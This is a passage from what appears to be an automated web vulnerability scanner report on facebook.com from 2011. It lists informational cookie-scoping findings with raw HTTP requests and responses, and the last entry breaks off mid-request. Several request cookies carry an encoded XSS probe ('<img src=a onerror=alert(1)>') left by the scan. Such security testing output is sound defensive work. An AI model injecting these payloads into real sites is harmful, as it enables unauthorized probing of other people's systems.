_e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.101.59
X-Cnection: close
Date: Thu, 05 May 2011 12:46:07 GMT
Content-Length: 18187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.52. http://www.facebook.com/mapquest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mapquest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapquest HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/MapQuest
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.49
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 0


10.53. http://www.facebook.com/matthew.oliveira2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.54. http://www.facebook.com/mmafighting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mmafighting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.164.73
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 198589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.55. http://www.facebook.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.111
Connection: close
Date: Thu, 05 May 2011 10:56:38 GMT
Content-Length: 0


10.56. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.57. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
  • next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?settings HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; wd=1022x1007; act=1304613664644%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613664645%2C%22act%22%2C1304613664644%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C181%2C760%2C0%2C1006%2C16%5D

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0


10.58. http://www.facebook.com/pages/Barnesville/115038011847083

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Barnesville/115038011847083

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Bernicks-Pepsi/123296084349478

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Blaine-Senior-High/106189406087059

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Editor-in-Chief/137829579583400

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Gilco-Corporation/109823499042436

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.64. http://www.facebook.com/pages/HMFIC/149403761740008

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HMFIC/149403761740008

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
